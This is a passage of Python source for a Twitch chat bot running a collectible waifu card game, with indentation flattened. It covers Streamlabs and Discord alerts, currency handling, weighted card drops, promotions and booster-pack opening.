if not booleanConfig("marathonBotFunctions"):
return
myheaders = headers.copy()
myheaders["Authorization"] = "OAuth " + config["marathonOAuth"].replace("oauth:", "")
myheaders["Content-Type"] = "application/json"
myheaders["Accept"] = "application/vnd.twitchtv.v5+json"
body = {"channel": {"status": str(title)}}
r = requests.put("https://api.twitch.tv/kraken/channels/"+config["marathonChannelID"], headers=myheaders, json=body)
try:
j = r.json()
except Exception:
logger.error(str(r.status_code))
logger.error(r.text)
def updateGame(game):
if not booleanConfig("marathonBotFunctions"):
return
myheaders = headers.copy()
myheaders["Authorization"] = "OAuth " + config["marathonOAuth"].replace("oauth:", "")
myheaders["Content-Type"] = "application/json"
myheaders["Accept"] = "application/vnd.twitchtv.v5+json"
body = {"channel": {"game": str(game)}}
r = requests.put("https://api.twitch.tv/kraken/channels/"+config["marathonChannelID"], headers=myheaders, json=body)
try:
j = r.json()
except Exception:
logger.error(str(r.status_code))
logger.error(r.text)
def sendStreamlabsAlert(channel, data):
if '#' in channel:
channel = channel[1:]
with busyLock:
with db.cursor() as cur:
cur.execute("SELECT alertkey FROM channels WHERE name = %s LIMIT 1", [channel])
tokenRow = cur.fetchone()
if tokenRow is not None and tokenRow[0] is not None:
data['access_token'] = tokenRow[0]
with streamlabsLock:
try:
req = requests.post(streamlabsalerturl, headers=alertheaders, json=data)
if req.status_code != 200:
logger.debug("response for streamlabs alert: %s; %s", str(req.status_code), str(req.text))
except Exception:
logger.error("Tried to send a Streamlabs alert to %s, but failed." % channel)
logger.error("Error: %s", str(sys.exc_info()))
def sendDiscordAlert(data):
with discordLock:
for url in discordhooks:
req2 = requests.post(
url,
json=data)
while req2.status_code == 429:
time.sleep((int(req2.headers["Retry-After"]) / 1000) + 1)
req2 = requests.post(
url,
json=data)
def sendAdminDiscordAlert(data):
with discordLock:
req2 = requests.post(config["adminDiscordHook"], json=data)
while req2.status_code == 429:
time.sleep((int(req2.headers["Retry-After"]) / 1000) + 1)
req2 = requests.post(
config["adminDiscordHook"],
json=data)
def sendDrawAlert(channel, waifu, user, discord=True):
logger.info("Alerting for waifu %s", str(waifu))
with busyLock:
cur = db.cursor()
# check for first time drop
first_time = "pulls" in waifu and waifu['pulls'] == 0
message = "*{user}* drew {first_time}[*{rarity}*] {name}!".format(user=str(user),
rarity=str(config["rarity" + str(
waifu["base_rarity"]) + "Name"]),
name=str(waifu["name"]),
first_time=(
"the first ever " if first_time else ""))
chanOwner = str(channel).replace("#", "")
cur.execute("SELECT config, val FROM alertConfig WHERE channelName = %s", [chanOwner])
rows = cur.fetchall()
colorKey = "rarity" + str(waifu["base_rarity"]) + "EmbedColor"
colorInt = int(config[colorKey])
# Convert RGB int to RGB values
blue = colorInt & 255
green = (colorInt >> 8) & 255
red = (colorInt >> 16) & 255
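# Example: colorInt 0xFF8800 unpacks to red=255, green=136, blue=0.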
alertconfig = {}
for row in rows:
alertconfig[row[0]] = row[1]
keys = alertconfig.keys()
alertChannel = "donation" if "alertChannel" not in keys else alertconfig["alertChannel"]
defaultSound = config["alertSound"] if "defaultSound" not in keys else alertconfig["defaultSound"]
alertSound = defaultSound if str("rarity" + str(waifu["base_rarity"]) + "Sound") not in keys else alertconfig[
str("rarity" + str(waifu["base_rarity"]) + "Sound")]
defaultLength = config["alertDuration"] if "defaultLength" not in keys else alertconfig["defaultLength"]
alertLength = defaultLength if str("rarity" + str(waifu["base_rarity"]) + "Length") not in keys else \
alertconfig[str("rarity" + str(waifu["base_rarity"]) + "Length")]
alertColor = "default" if "color" not in keys else alertconfig["color"]
if "id" in waifu:
cur.execute("SELECT sound, length FROM waifuAlerts WHERE waifuid=%s", [waifu["id"]])
rows = cur.fetchall()
if len(rows) == 1:
alertLength = int(rows[0][1])
alertSound = str(rows[0][0])
alertbody = {"type": alertChannel, "image_href": waifu["image"],
"sound_href": alertSound, "duration": int(alertLength), "message": message}
if alertColor == "rarity":
alertbody["special_text_color"] = "rgb({r}, {g}, {b})".format(r=str(red), g=str(green), b=str(blue))
cur.close()
threading.Thread(target=sendStreamlabsAlert, args=(channel, alertbody)).start()
if discord:
# check for first time drop
rarityName = str(config["rarity" + str(waifu["base_rarity"]) + "Name"])
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A{n} {rarity} waifu has been dropped{first_time}!".format(
rarity=rarityName,
first_time=(" for the first time" if first_time else ""),
n='n' if rarityName[0] in ('a', 'e', 'i', 'o', 'u') else '')
},
{
"type": "rich",
"title": "{user} dropped [{wid}] {name}!".format(user=str(user), wid=str(waifu["id"]),
name=str(waifu["name"])),
"url": "https://twitch.tv/{name}".format(name=str(channel).replace("#", "").lower()),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"image": {
"url": str(waifu["image"])
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
if colorKey in config:
discordbody["embeds"][0]["color"] = int(config[colorKey])
discordbody["embeds"][1]["color"] = int(config[colorKey])
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def sendDisenchantAlert(channel, waifu, user):
# no streamlabs alert for now
# todo maybe make a b&w copy of the waifu image
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A {rarity} waifu has been disenchanted!".format(
rarity=str(config["rarity" + str(waifu["base_rarity"]) + "Name"]))
},
{
"type": "rich",
"title": "[{wid}] {name} has been disenchanted! Press F to pay respects.".format(name=str(waifu["name"]),
wid=str(waifu["id"])),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"image": {
"url": str(waifu["image"])
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
colorKey = "rarity" + str(waifu["base_rarity"]) + "EmbedColor"
if colorKey in config:
discordbody["embeds"][0]["color"] = int(config[colorKey])
discordbody["embeds"][1]["color"] = int(config[colorKey])
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def sendPromotionAlert(userid, waifuid, new_rarity):
with busyLock:
# check for duplicate alert and don't send it
# UNLESS this is a promotion to MAX rarity
if new_rarity != int(config["numNormalRarities"]) - 1:
with db.cursor() as cur:
cur.execute(
"SELECT COUNT(*) FROM promotion_alerts_sent WHERE userid = %s AND waifuid = %s AND rarity >= %s",
[userid, waifuid, new_rarity])
result = cur.fetchone()[0]
if result > 0:
return
# get data necessary for the alert and note that we sent it
# TODO maybe use display name instead
waifu = getWaifuById(waifuid)
with db.cursor() as cur:
cur.execute("SELECT name FROM users WHERE id = %s", [userid])
username = cur.fetchone()[0]
cur.execute("REPLACE INTO promotion_alerts_sent (userid, waifuid, rarity) VALUES(%s, %s, %s)",
[userid, waifuid, new_rarity])
# compile alert
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A waifu has been promoted!",
"color": int(config["rarity%dEmbedColor" % new_rarity])
},
{
"type": "rich",
"title": "{user} promoted [{wid}] {name} to {rarity} rarity!".format(user=username, name=waifu["name"],
wid=str(waifu["id"]),
rarity=config[
"rarity%dName" % new_rarity]),
"color": int(config["rarity%dEmbedColor" % new_rarity]),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"image": {
"url": waifu["image"]
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def naturalJoinNames(names):
if len(names) == 1:
return names[0]
return ", ".join(names[:-1]) + " and " + names[-1]
def getWaifuRepresentationString(waifuid, baserarity=None, cardrarity=None, waifuname=None):
if baserarity is None or cardrarity is None or waifuname is None:
waifuData = getWaifuById(waifuid)
if baserarity is None:
baserarity = waifuData['base_rarity']
if cardrarity is None:
cardrarity = baserarity
if waifuname is None:
waifuname = waifuData['name']
promoteDiff = cardrarity - baserarity
promoteStars = (" (" + ("★" * (promoteDiff)) + ")") if promoteDiff > 0 else ""
retStr = "[%d][%s%s] %s" % (
waifuid, config["rarity" + str(cardrarity) + "Name"], promoteStars, waifuname)
return retStr
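# Example (the rarity name comes from config, so "Epic" is an assumption): a card of
# waifu 123 named "Neptune", one rarity step above its base, renders as
# "[123][Epic (★)] Neptune" when config["rarity<cardrarity>Name"] is "Epic".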
def sendSetAlert(channel, user, name, waifus, reward, firstTime, discord=True):
logger.info("Alerting for set claim %s", name)
with busyLock:
with db.cursor() as cur:
chanOwner = str(channel).replace("#", "")
cur.execute("SELECT config, val FROM alertConfig WHERE channelName = %s", [chanOwner])
rows = cur.fetchall()
alertconfig = {row[0]: row[1] for row in rows}
alertChannel = "donation" if "alertChannel" not in alertconfig else alertconfig["alertChannel"]
defaultSound = config["alertSound"] if "defaultSound" not in alertconfig else alertconfig["defaultSound"]
alertSound = defaultSound if "setClaimSound" not in alertconfig else alertconfig["setClaimSound"]
defaultLength = config["alertDuration"] if "defaultLength" not in alertconfig else alertconfig["defaultLength"]
alertLength = defaultLength if "setClaimLength" not in alertconfig else alertconfig["setClaimLength"]
message = "{user} claimed the set {name}!".format(user=user, name=name)
alertbody = {"type": alertChannel, "sound_href": alertSound, "duration": int(alertLength), "message": message}
threading.Thread(target=sendStreamlabsAlert, args=(channel, alertbody)).start()
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A set has been completed%s!" % (" for the first time" if firstTime else ""),
"color": int(config["rarity" + str(int(config["numNormalRarities"]) - 1) + "EmbedColor"])
},
{
"type": "rich",
"title": "{user} completed the set {name}!".format(user=str(user), name=name),
"description": "They gathered {waifus} and received {reward} as their reward.".format(waifus=naturalJoinNames(waifus), reward=reward),
"url": "https://twitch.tv/{name}".format(name=str(channel).replace("#", "").lower()),
"color": int(config["rarity" + str(int(config["numNormalRarities"]) - 1) + "EmbedColor"]),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
if discord:
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def followsme(userid):
try:
krakenHeaders = {"Authorization": "OAuth %s" % config["appAccessToken"],
"Accept": "application/vnd.twitchtv.v5+json"}
r = requests.get(
"https://api.twitch.tv/kraken/users/{twitchid}/follows/channels/{myid}".format(twitchid=str(userid),
myid=str(
config["twitchid"])),
headers=krakenHeaders)
j = r.json()
return "channel" in j and "_id" in j["channel"] and int(config["twitchid"]) == int(j["channel"]["_id"])
except Exception:
return False
def getWaifuById(id):
try:
id = int(id)
if id < 1:
return None
except ValueError:
return None
with db.cursor(pymysql.cursors.DictCursor) as cur:
cur.execute("SELECT id, name, image, base_rarity, series, can_lookup, pulls, last_pull, can_favourite, can_purchase FROM waifus WHERE id=%s", [id])
return cur.fetchone()
def getWaifuOwners(id, rarity):
with db.cursor() as cur:
baseRarityName = config["rarity%dName" % rarity]
godRarity = int(config["numNormalRarities"]) - 1
cur.execute(
"SELECT users.name, c1.rarity, IF(c1.boosterid IS NOT NULL, 1, 0), IF(c1.rarity = %s AND NOT EXISTS(SELECT id FROM cards c2 WHERE c2.userid IS NOT NULL AND c2.rarity = %s AND c2.waifuid = c1.waifuid AND (c2.created < c1.created OR (c2.created=c1.created AND c2.id < c1.id))), 1, 0) AS firstGod FROM cards c1 JOIN users ON c1.userid = users.id WHERE c1.waifuid = %s AND c1.userid IS NOT NULL ORDER BY firstGod DESC, c1.rarity DESC, c1.created ASC, users.name ASC",
[godRarity, godRarity, id])
allOwners = cur.fetchall()
# compile per-owner data grouped into not in booster / in booster
ownerDescriptions = [[], []]
for i in range(2):
ownerData = OrderedDict()
ownedByOwner = {}
for row in allOwners:
if row[2] != i:
continue
if row[0] not in ownerData:
ownerData[row[0]] = OrderedDict()
ownedByOwner[row[0]] = 0
rarityName = ("α" if row[3] else "") + config["rarity%dName" % row[1]]
if rarityName not in ownerData[row[0]]:
ownerData[row[0]][rarityName] = 0
ownerData[row[0]][rarityName] += 1
ownedByOwner[row[0]] += 1
for owner in ownerData:
if len(ownerData[owner]) != 1 or baseRarityName not in ownerData[owner] or ownedByOwner[owner] > 1:
# verbose
ownerDescriptions[i].append(owner + " (" + ", ".join([("%d %s" % (ownerData[owner][k], k) if ownerData[owner][k] > 1 else k) for k in ownerData[owner]]) + ")")
else:
ownerDescriptions[i].append(owner)
return ownerDescriptions
def hasPoints(userid, amount):
cur = db.cursor()
cur.execute("SELECT points FROM users WHERE id = %s", [userid])
ret = int(cur.fetchone()[0]) >= int(amount)
cur.close()
return ret
def addPoints(userid, amount):
cur = db.cursor()
cur.execute("UPDATE users SET points = points + %s WHERE id = %s", [amount, userid])
cur.close()
def getPuddingBalance(userid):
with db.cursor() as cur:
cur.execute("SELECT puddingCurrent, puddingPrevious, puddingExpiring FROM users WHERE id = %s", [userid])
pinfo = cur.fetchone()
return None if pinfo is None else [int(n) for n in pinfo]
def hasPudding(userid, amount):
bal = getPuddingBalance(userid)
return bal is not None and sum(bal) >= amount
def addPudding(userid, amount):
with db.cursor() as cur:
cur.execute("UPDATE users SET puddingCurrent = puddingCurrent + %s WHERE id = %s", [amount, userid])
def takePudding(userid, amount):
pinfo = getPuddingBalance(userid)
if pinfo is None or sum(pinfo) < amount:
raise ValueError()
# take from the pudding starting from the expiring amount first
idx = 2
while amount > 0:
new_val = max(pinfo[idx] - amount, 0)
amount -= pinfo[idx] - new_val
pinfo[idx] = new_val
idx -= 1
# save the updated values
with db.cursor() as cur:
cur.execute("UPDATE users SET puddingCurrent = %s, puddingPrevious = %s, puddingExpiring = %s WHERE id = %s", pinfo + [userid])
def maxWaifuID():
cur = db.cursor()
cur.execute("SELECT MAX(id) FROM waifus")
ret = int(cur.fetchone()[0])
cur.close()
return ret
def maxBadgeID():
cur = db.cursor()
cur.execute("SELECT MAX(id) FROM badges")
ret = int(cur.fetchone()[0])
cur.close()
return ret
def getUniqueCards(userid):
with db.cursor() as cur:
uniqueRarities = [rarity for rarity in range(int(config["numNormalRarities"])) if
int(config["rarity%dBuyPrice" % rarity]) <= 0]
if len(uniqueRarities) == 0:
return []
else:
inStr = ",".join(["%s"] * len(uniqueRarities))
cur.execute("SELECT DISTINCT waifuid FROM cards WHERE userid = %s AND boosterid IS NULL AND rarity IN ({0})".format(inStr),
[userid] + uniqueRarities)
rows = cur.fetchall()
return [row[0] for row in rows]
def dropCard(rarity=-1, upgradeChances=None, useEventWeightings=False, allowDowngrades=True, bannedCards=None):
random.seed()
if rarity == -1:
maxrarity = int(config["numNormalRarities"]) - 1
if upgradeChances is None:
upgradeChances = [float(config["rarity%dUpgradeChance" % i]) for i in range(maxrarity)]
else:
assert len(upgradeChances) == maxrarity
rarity = 0
while rarity < maxrarity:
if random.random() < upgradeChances[rarity]:
rarity += 1
else:
break
return dropCard(rarity=rarity, useEventWeightings=useEventWeightings, allowDowngrades=allowDowngrades,
bannedCards=bannedCards)
else:
with db.cursor() as cur:
if bannedCards is not None and len(bannedCards) > 0:
banClause = " AND id NOT IN(" + ",".join(["%s"] * len(bannedCards)) + ")"
else:
banClause = ""
bannedCards = []
weighting_column = "(event_weighting*normal_weighting)" if useEventWeightings else "normal_weighting"
result = None
if rarity >= int(config["strongerWeightingMinRarity"]):
cur.execute("SELECT id FROM waifus WHERE base_rarity = %s{1} AND normal_weighting >= 1 ORDER BY -LOG(1-RAND())/{0} LIMIT 1".format(weighting_column, banClause), [rarity] + bannedCards)
result = cur.fetchone()
if result is None:
cur.execute("SELECT id FROM waifus WHERE base_rarity = %s{1} ORDER BY -LOG(1-RAND())/{0} LIMIT 1".format(weighting_column, banClause), [rarity] + bannedCards)
result = cur.fetchone()
if result is None:
# no waifus left at this rarity
logger.info("No droppable waifus left at rarity %d" % rarity)
if allowDowngrades:
return dropCard(rarity=rarity - 1, useEventWeightings=useEventWeightings, bannedCards=bannedCards)
else:
return None
else:
return result[0]
def recordPullMetrics(*cards):
with db.cursor() as cur:
inString = ",".join(["%s"] * len(cards))
pullTime = current_milli_time()
cur.execute(
"UPDATE waifus SET normal_weighting = normal_weighting / %s, pulls = pulls + 1, last_pull = %s WHERE id IN({0}) AND normal_weighting <= 1".format(
inString), [float(config["weighting_increase_amount"])**4, pullTime] + list(cards))
cur.execute(
"UPDATE waifus SET normal_weighting = 1, pulls = pulls + 1, last_pull = %s WHERE id IN({0}) AND normal_weighting > 1".format(
inString), [pullTime] + list(cards))
def attemptPromotions(*cards):
promosDone = {}
with db.cursor() as cur:
for waifuid in cards:
while True:
usersThisCycle = []
cur.execute(
"SELECT userid, rarity, COUNT(*) AS amount FROM cards JOIN waifus ON cards.waifuid = waifus.id WHERE cards.waifuid = %s AND cards.boosterid IS NULL AND cards.userid IS NOT NULL AND waifus.can_promote = 1 GROUP BY cards.userid, cards.rarity HAVING COUNT(*) > 1 ORDER BY cards.rarity ASC, RAND() ASC",
[waifuid])
candidates = cur.fetchall()
for row in candidates:
if row[0] in usersThisCycle:
continue
userid = row[0]
rarity = row[1]
amount = row[2]
if rarity < int(config["numNormalRarities"]) - 1 and amount >= int(
config["rarity%dPromoteAmount" % rarity]):
promoteAmount = int(config["rarity%dPromoteAmount" % rarity])
amountToMake = amount // promoteAmount
if amountToMake != 0:
usersThisCycle.append(userid)
# fetch card ids to use - take the ones with the least trade restrictions
cur.execute("SELECT id, COALESCE(tradeableAt, 0) FROM cards WHERE waifuid = %s AND userid = %s AND rarity = %s AND boosterid IS NULL ORDER BY tradeableAt ASC", [waifuid, userid, rarity])
fodder = cur.fetchall()
for i in range(amountToMake):
material = fodder[i*promoteAmount:(i+1)*promoteAmount]
tradeTS = max([row[1] for row in material])
for row in material:
updateCard(row[0], {"userid": None, "boosterid": None})
newID = addCard(userid, waifuid, 'promotion', None, rarity+1)
if tradeTS > 0:
updateCard(newID, {"tradeableAt": tradeTS})
# update promosDone
if userid not in promosDone:
promosDone[userid] = {}
if waifuid not in promosDone[userid] or promosDone[userid][waifuid] < rarity + 1:
promosDone[userid][waifuid] = rarity + 1
if len(usersThisCycle) == 0:
# nothing changed, we're done
break
# promo alerts
for user in promosDone:
for waifu in promosDone[user]:
if promosDone[user][waifu] >= int(config["promotionAlertMinimumRarity"]):
threading.Thread(target=sendPromotionAlert, args=(user, waifu, promosDone[user][waifu])).start()
def formatRank(rankNum):
if (rankNum % 100) // 10 == 1 or rankNum % 10 == 0 or rankNum % 10 > 3:
return "%dth" % rankNum
elif rankNum % 10 == 1:
return "%dst" % rankNum
elif rankNum % 10 == 2:
return "%dnd" % rankNum
else:
return "%drd" % rankNum
memes = ["🤔", "🏆", "✌", "🌲", "🍀", "🖐", "👌", "🤑", "🤣", "🎄"]
def formatTimeDelta(ms, showMS=True):
output = str(datetime.timedelta(milliseconds=int(ms), microseconds=0))
if "." in output:
output = output[:-3] if showMS else output[:-7]
if "memeMode" in config and config["memeMode"] == "meme":
for i in range(10):
output = output.replace(str(i), memes[i])
return output
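# Example: formatTimeDelta(5025600) -> "1:23:45.600"; with showMS=False it yields
# "1:23:45" (and memeMode, if enabled, swaps each digit for an emoji).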
def parseRarity(input):
try:
rarity = int(input)
except Exception:
if input.lower() in revrarity:
rarity = revrarity[input.lower()]
else:
raise ValueError(input)
if rarity < 0 or rarity >= int(config["numNormalRarities"]) + int(config["numSpecialRarities"]):
raise ValueError(input)
return rarity
def parseBetTime(input):
match = time_regex.fullmatch(input)
if not match:
return None
bet = match.groupdict()
if bet["ms"] is None:
bet["ms"] = "0"
ms = int(bet["ms"] + ("0" * max(3 - len(bet["ms"]), 0)))
total = int(bet["hours"]) * 3600000 + int(bet["minutes"]) * 60000 + int(bet["seconds"]) * 1000 + ms
return {"hours": total // 3600000, "minutes": (total // 60000) % 60, "seconds": (total // 1000) % 60,
"ms": total % 1000, "total": total}
class CardNotInHandException(Exception):
pass
class CardIDNotInHandException(CardNotInHandException):
pass
class AmbiguousWaifuException(Exception):
pass
# given a string specifying a waifu id or card id, return card id of the hand card matching it
# throw various exceptions for invalid format / card not in hand / owns more than 1 copy of the waifu
def parseHandCardSpecifier(hand, specifier, rarity=None):
id = int(specifier)
if id < int(config["minimumCardID"]):
# waifuid
cardFound = None
for card in hand:
if card['waifuid'] == id and (rarity is None or rarity == card['rarity']):
if cardFound is None:
cardFound = card
else:
raise AmbiguousWaifuException()
if cardFound is None:
raise CardNotInHandException()
return cardFound
else:
for card in hand:
if card['cardid'] == id and (rarity is None or rarity == card['rarity']):
return card
raise CardIDNotInHandException()
class InvalidBoosterException(Exception):
pass
class CantAffordBoosterException(Exception):
def __init__(self, cost):
super(CantAffordBoosterException, self).__init__()
self.cost = cost
def getPackStats(userid):
with db.cursor() as cur:
cur.execute(
"SELECT bo.boostername, COUNT(*) FROM (SELECT id, boostername FROM boosters_opened WHERE userid = %s UNION SELECT id, boostername FROM archive_boosters_opened WHERE userid = %s) AS bo JOIN boosters ON (bo.boostername IN(boosters.name, CONCAT('mega', boosters.name))) WHERE boosters.cost > 0 GROUP BY bo.boostername ORDER BY COUNT(*) DESC",
[userid] * 2)
packstats = cur.fetchall()
return packstats
def getSpendings(userid):
with db.cursor() as cur:
cur.execute("SELECT spending FROM users WHERE id = %s", [userid])
result = cur.fetchall()
return int(result[0][0])
def getHandUpgradeLUT():
with db.cursor() as cur:
cur.execute("SELECT slot, spendings FROM handupgrades")
lut = cur.fetchall()
return lut
def getNextUpgradeSpendings(userid):
lut = getHandUpgradeLUT()
currSlots = paidHandUpgrades(userid)
paidSlots = currSlots
nextSpendings = 0
while currSlots >= len(lut) - 1:
currSlots -= 1
nextSpendings += 1000000
nextSpendings += lut[currSlots + 1][1]
return nextSpendings
def checkHandUpgrade(userid):
userid = int(userid)
nextSpendings = getNextUpgradeSpendings(userid)
spendings = getSpendings(userid)
logger.debug("next spendings: %d", nextSpendings)
logger.debug("current spendings: %d", spendings)
if spendings >= nextSpendings:
upgradeHand(userid)
logger.debug("Upgraded Hand for %d", userid)
return True
return False
def messageForHandUpgrade(userid, username, bot, channel, isWhisper):
bot.message(channel, "%s, you just got a new hand space from booster spending! naroYay" % username, isWhisper)
def addSpending(userid, amount):
with db.cursor() as cur:
cur.execute("UPDATE users SET spending=spending + %s WHERE id = %s", [amount, userid])
def addBooster(userid, boostername, paid, status, eventTokens, channel, isWhisper):
with db.cursor() as cur:
trueChannel = "$$whisper$$" if isWhisper else channel
cur.execute(
"INSERT INTO boosters_opened (userid, boostername, paid, created, status, eventTokens, channel) VALUES(%s, %s, %s, %s, %s, %s, %s)",
[userid, boostername, paid, current_milli_time(), status, eventTokens, trueChannel])
return cur.lastrowid
def openBooster(bot, userid, username, display_name, channel, isWhisper, packname, buying=True, mega=False):
with db.cursor() as cur:
rarityColumns = ", ".join(
"rarity" + str(i) + "UpgradeChance" for i in range(int(config["numNormalRarities"]) - 1))
if buying:
cur.execute(
"SELECT listed, buyable, cost, numCards, guaranteeRarity, guaranteeCount, useEventWeightings, maxEventTokens, eventTokenChance, canMega, " + rarityColumns + " FROM boosters WHERE name = %s AND buyable = 1",
[packname])
else:
cur.execute(
"SELECT listed, buyable, cost, numCards, guaranteeRarity, guaranteeCount, useEventWeightings, maxEventTokens, eventTokenChance, canMega, " + rarityColumns + " FROM boosters WHERE name = %s",
[packname])
packinfo = cur.fetchone()
if packinfo is None:
raise InvalidBoosterException()
listed = packinfo[0]
buyable = packinfo[1]
cost = packinfo[2]
numCards = packinfo[3]
pgRarity = packinfo[4]
pgCount = packinfo[5]
useEventWeightings = packinfo[6] != 0
numTokens = packinfo[7]
tokenChance = packinfo[8]
canMega = packinfo[9]
normalChances = packinfo[10:]
if numTokens >= numCards:
raise InvalidBoosterException()
iterations = 1
if mega:
if not canMega:
raise InvalidBoosterException()
iterations = 5
if buying:
if not hasPoints(userid, cost*iterations):
raise CantAffordBoosterException(cost*iterations)
addPoints(userid, -cost*iterations)
minScalingRarity = int(config["pullScalingMinRarity"])
maxScalingRarity = int(config["pullScalingMaxRarity"])
numScalingRarities = maxScalingRarity - minScalingRarity + 1
scalingThresholds = [int(config["pullScalingRarity%dThreshold" % rarity]) for rarity in
range(minScalingRarity, maxScalingRarity + 1)]
cur.execute("SELECT pullScalingData FROM users WHERE id = %s", [userid])
scalingRaw = cur.fetchone()[0]
if scalingRaw is None:
scalingData = [0] * numScalingRarities
else:
scalingData = [int(n) for n in scalingRaw.split(':')]
totalTokensDropped = 0
cards = []
alertwaifus = []
uniques = getUniqueCards(userid)
totalDE = 0
logPackName = "mega" + packname if mega else packname
for _ in range(iterations): # the loop index is unused; avoid shadowing the builtin iter()
tokensDropped = 0
for n in range(numTokens):
if random.random() < tokenChance:
tokensDropped += 1
totalTokensDropped += tokensDropped
iterDE = 0
for i in range(numCards - tokensDropped):
# scale chances of the card appropriately
currentChances = list(normalChances)
guaranteedRarity = 0
if listed and buyable:
for rarity in range(maxScalingRarity, minScalingRarity - 1, -1):
scaleIdx = rarity - minScalingRarity
if scalingData[scaleIdx] >= scalingThresholds[scaleIdx] * 2:
# guarantee this rarity drops now
if rarity == int(config["numNormalRarities"]) - 1:
currentChances = [1] * len(currentChances)
else:
currentChances = ([1] * rarity) + [
functools.reduce((lambda x, y: x * y), currentChances[:rarity + 1])] + list(
currentChances[rarity + 1:])
guaranteedRarity = rarity
break
elif scalingData[scaleIdx] > scalingThresholds[scaleIdx]:
# make this rarity more likely to drop
oldPromoChance = currentChances[rarity - 1]
currentChances[rarity - 1] = min(currentChances[rarity - 1] * (
(scalingData[scaleIdx] / scalingThresholds[scaleIdx] - 1) * 2 + 1), 1)
if rarity != int(config["numNormalRarities"]) - 1:
# make rarities above this one NOT more likely to drop
currentChances[rarity] /= currentChances[rarity - 1] / oldPromoChance
# account for minrarity for some cards in the pack
if i < pgCount and pgRarity > guaranteedRarity:
if pgRarity == int(config["numNormalRarities"]) - 1:
currentChances = [1] * len(currentChances)
else:
currentChances = ([1] * pgRarity) + [
functools.reduce((lambda x, y: x * y), currentChances[:pgRarity + 1])] + list(
currentChances[pgRarity + 1:])
# actually drop the card
logger.debug("using odds for card %d: %s", i, str(currentChances))
card = int(dropCard(upgradeChances=currentChances, useEventWeightings=useEventWeightings,
bannedCards=uniques + cards))
cards.append(card)
# check its rarity and adjust scaling data
waifu = getWaifuById(card)
iterDE += int(config["rarity%dValue" % waifu['base_rarity']])
if waifu['base_rarity'] >= int(config["drawAlertMinimumRarity"]):
alertwaifus.append(waifu)
if listed and buyable:
for r in range(numScalingRarities):
if r + minScalingRarity != waifu['base_rarity']:
scalingData[r] += cost / (numCards - tokensDropped)
else:
scalingData[r] = 0
totalDE += iterDE
# did they win a free amount-based reward pack?
if packname in packAmountRewards and iterDE in packAmountRewards[packname]:
reward = packAmountRewards[packname][iterDE]
giveFreeBooster(userid, reward)
msgArgs = (reward, packname, iterDE, reward)
bot.message("#%s" % username, "You won a free %s pack due to getting a %s pack worth %d points. Open it with !freepacks open %s" % msgArgs, True)
cards.sort()
recordPullMetrics(*cards)
addSpending(userid, cost*iterations)
# pity pull data update
cur.execute("UPDATE users SET pullScalingData = %s, eventTokens = eventTokens + %s WHERE id = %s",
[":".join(str(round(n)) for n in scalingData), totalTokensDropped, userid])
# insert opened booster
boosterid = addBooster(userid, logPackName, cost*iterations if buying else 0, 'open', totalTokensDropped, channel, isWhisper)
for card in cards:
addCard(userid, card, 'booster', boosterid)
# alerts
alertname = display_name if display_name.lower() == username.lower() else "%s (%s)" % (display_name, username)
for w in alertwaifus:
threading.Thread(target=sendDrawAlert, args=(channel, w, alertname)).start()
return boosterid
def giveFreeBooster(userid, boostername, amount=1):
with db.cursor() as cur:
cur.execute("INSERT INTO freepacks (userid, boostername, remaining, total) VALUES(%s, %s, %s, %s)"
+ " ON DUPLICATE KEY UPDATE remaining = remaining + %s, total = total + %s",
[userid, boostername, amount, amount, amount, amount])
def infoCommandAvailable(userid, username, displayName, bot, channel, isWhisper):
with db.cursor() as cur:
private = isWhisper or channel == '#' + config['username'] or channel == '#' + username
columnName = "Private" if private else "Public"
cur.execute("SELECT infoUsed{0}, infoLastReset{0} FROM users WHERE id = %s".format(columnName), [userid])
limitData = list(cur.fetchone())
timeUntilReset = limitData[1] - (current_milli_time() - int(config["infoResetPeriod"]) * 60000)
if timeUntilReset <= 0:
limitData[0] = 0
cur.execute("UPDATE users SET infoUsed{0} = 0, infoLastReset{0} = %s WHERE id = %s".format(columnName),
[current_milli_time(), userid])
limit = int(config["infoLimit%s" % columnName])
if limitData[0] < limit:
return True
else:
timeDiff = formatTimeDelta(timeUntilReset, False)
if private:
bot.message(channel,
"%s, you have hit the rate limit for info commands. Please wait %s to use more." % (
displayName, timeDiff), isWhisper)
else:
bot.message(channel,
"%s, you have hit the rate limit for info commands in public chats. Please wait %s to use more or use them via whisper or in the bot's own chat." % (
displayName, timeDiff), isWhisper)
return False
def useInfoCommand(userid, username, channel, isWhisper):
with db.cursor() as cur:
private = isWhisper or channel == '#' + config['username'] or channel == '#' + username
columnName = "Private" if private else "Public"
cur.execute("UPDATE users SET infoUsed{0} = infoUsed{0} + 1 WHERE id = %s".format(columnName), [userid])
def generateRewardsSeed(cycleLength, numGoodRewards):
# generate a reasonable rewards seed
# "reasonable" is defined as the gap between successive good rewards
# being between (CL/NumGood)/2 and (CL/NumGood)*2 every time
# where gap is 1, not 0, for two consecutive good rewards
# uses 0 to (numGoodRewards-1) to represent the good rewards
# and other numbers to represent the bad
hasSeed = False
while not hasSeed:
seed = random.randrange(0, 0x10000000000000000)
if numGoodRewards == 0 or cycleLength == numGoodRewards:
return seed
generator = random.Random(seed)
order = list(range(cycleLength))
generator.shuffle(order)
hasSeed = True
lastPos = -1
for i in range(int(numGoodRewards)):
pos = lastPos + 1
while order[pos] >= numGoodRewards:
pos += 1
if pos - lastPos <= (cycleLength/numGoodRewards)/2 or pos - lastPos >= (cycleLength/numGoodRewards)*2:
hasSeed = False
break
lastPos = pos
if cycleLength - lastPos >= (cycleLength/numGoodRewards)*2:
hasSeed = False
return seed
